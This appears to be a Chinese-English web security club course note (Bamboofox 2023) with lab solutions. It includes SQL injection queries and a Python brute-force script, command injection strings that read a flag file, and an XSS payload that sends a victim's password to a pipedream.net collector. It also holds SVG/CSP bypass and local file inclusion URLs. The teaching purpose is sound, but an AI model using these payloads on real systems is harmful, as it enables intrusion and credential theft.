Try   HackMD

Bamboofox Web Security 2023

Tools

Burpsuite

https://portswigger.net/burp/releases/professional-community-2023-10-1-1?requestededition=community&requestedplatform=

Python3

https://www.python.org/downloads/

requests

pip3 install requests

HTTP requests

Burpsuite proxy

Status code

  1. Informational responses (100 – 199)
  2. Successful responses (200 – 299)
  3. Redirection messages (300 – 399)
  4. Client error responses (400 – 499)
  5. Server error responses (500 – 599)

HTTP headers

Lab: Cat shop

SQL injection

https://training.ching367436.me/sqlite3-viewer/
https://training.ching367436.me/sql-injection-viewer/
https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL Injection/SQLite Injection.md

Lab: Login panel (login)

UNION based

Lab: Login panel 2 (password)

Lab: Login panel 2 (other table)

1. Extract table name
' UNION SELECT 1,(),3,4 --

() 裡面放 SELECT group_concat(tbl_name) FROM sqlite_master WHERE type='table' and tbl_name NOT like 'sqlite_%' 可以選出所有這個 database 裡面的 table_name

Result:

Users,S3cr3t_t4bl3
2. Extract column name of the S3cr3t_t4bl3
SELECT sql FROM sqlite_master WHERE type!='meta' AND sql NOT NULL AND name ='S3cr3t_t4bl3'

Result:

CREATE TABLE S3cr3t_t4bl3 (id INTEGER PRIMARY KEY, flag_test1234 TEXT)
3. Get the flag
SELECT flag_test1234 FROM S3cr3t_t4bl3

Boolean based

Lab: Login panel (password)

' OR substr((SELECT password FROM Users WHERE username='admin'), 1, 1)='B' -- 

爆破腳本

import requests
from string import printable

def f(guess,i):
    url = "http://bamboofox.cs.nctu.edu.tw:38300/login"
    a  = requests.post(url,{
    "username":"guest",
    "password":f"' OR substr((SELECT password FROM Users WHERE username='admin'),{i+1},1)='{guess}' --"
    })
    return '2FA' in a.text


res=""
for i in range(128):
    for guess in printable:
        if f(guess,i):
            res += guess
            break
    print(res)

Other techniques

  • Time based
  • Error based
  • Out of bound
  • Write file

Tools

  • sqlmap

Race condition

Lab: Starburst Cat Shop

Steps for buying a cat

  1. Check if the balance is sufficient.
  2. Make the cat the buyer's property.
  3. balance -= cat_price

Command injection

Command

Tools

去年社課:https://discord.com/channels/1003684703284498462/1003684704291143853/1082607913509584956

簡報連結:https://drive.google.com/file/d/1GKCqR78Hg27sgreviXyFGeeOmzFS6vpL/view?usp=share_link

PHP

Lab: Curl Online

curl -s '$url';

$url = "';ls'";
curl -s '';ls'';

$url = "';l's' '/";
curl -s '';l's' '/';

$url = "'; ca't' '/f''lag-415cd468353da8d26974ae6f8a7d9b30a830b8b4";
curl -s ''; ca't' '/f''lag-415cd468353da8d26974ae6f8a7d9b30a830b8b4'

Lab: Curl Online Pro

Lab: Curl Online Max

https://training.ching367436.me/shell/shell.php
https://training.ching367436.me/shell/shell.php\

solve

https://training.ching367436.me/shell/shell.php' -o ching367436.php 'test
curl -s 'https://training.ching367436.me/shell/shell.php'\\'' -o ching367436.php '\\''test'

Front-end security

URL

 http://userinfo@bamboofox.cs.nctu.edu.tw:38300/login?name=ferret#nose
 \__/   \_____________________________________/\____/ \_________/\__/
  |                       |                      |         |       |
scheme                authority                path     query   fragment

https://github.com/splitline/domain-obfuscator
http://www.unicode.org/reports/tr46/#Mapping

IDNA2003 requires a mapping phase, which maps ÖBB.at to öbb.at, for example. Mapping typically involves mapping uppercase characters to their lowercase pairs, but it also involves other types of mappings between equivalent characters, such as mapping halfwidth katakana characters to normal katakana characters in Japanese. The mapping phase in IDNA2003 was included to match the insensitivity of ASCII domain names. Users are accustomed to having both CNN.com and cnn.com work identically. They expect domain names with accents to have the same casing behavior, so that ÖBB.at is the same as öbb.at. There are variations similar to case differences in other scripts. The IDNA2003 mapping is based on data specified in the Unicode Standard, Version 3.2; this mapping was later formalized as the Unicode property [NFKC_Casefold].

HTML, CSS, JavaScript

Tools

Same-origin policy

Same-origin: Protocol, port, and host are the same.

Cross-site scripting (XSS)

Lab: E-Portfolio baby

https://webhook.site/
https://pipedream.net/

fetch('/api/portfolio')
    .then(res => res.json())
        .then(data => {
            location = 'https://enr7kjj1uzbla.x.pipedream.net/?'+data.data.password
        })
<img src=x onerror="fetch('/api/portfolio').then(res => res.json()).then(data => {location = 'https://enr7kjj1uzbla.x.pipedream.net/?'+data.data.password;})">

解:https://ching367436.github.io/ais3-pre-exam-2023-write-up/#E-portfolio-baby

Content Security Policy (CSP)

https://csp-evaluator.withgoogle.com/

Lab: E-Portfolio

https://e-portfolio.ching367436.me:8443/avatars/ea6209bcae582fd7a60a77dc71d624e4.svg

<svg xmlns="http://www.w3.org/2000/svg">
    <script href="https://accounts.google.com/o/oauth2/revoke?callback=location='https://ching367436.me';"></script>
</svg>

解:https://ching367436.github.io/ais3-pre-exam-2023-write-up/#E-portfolio

XSS games

https://xss-game.appspot.com
https://prompt.ml

Local File Inclusion

Lab: Simple Site (retrieve source code)

https://simple-site.ching367436.me:8443/?page=php://filter/convert.base64-encode/resource=./includes/contact.php

Lab: Simple Site (RCE)

https://github.com/wupco/PHP_INCLUDE_TO_SHELL_CHAR_DICT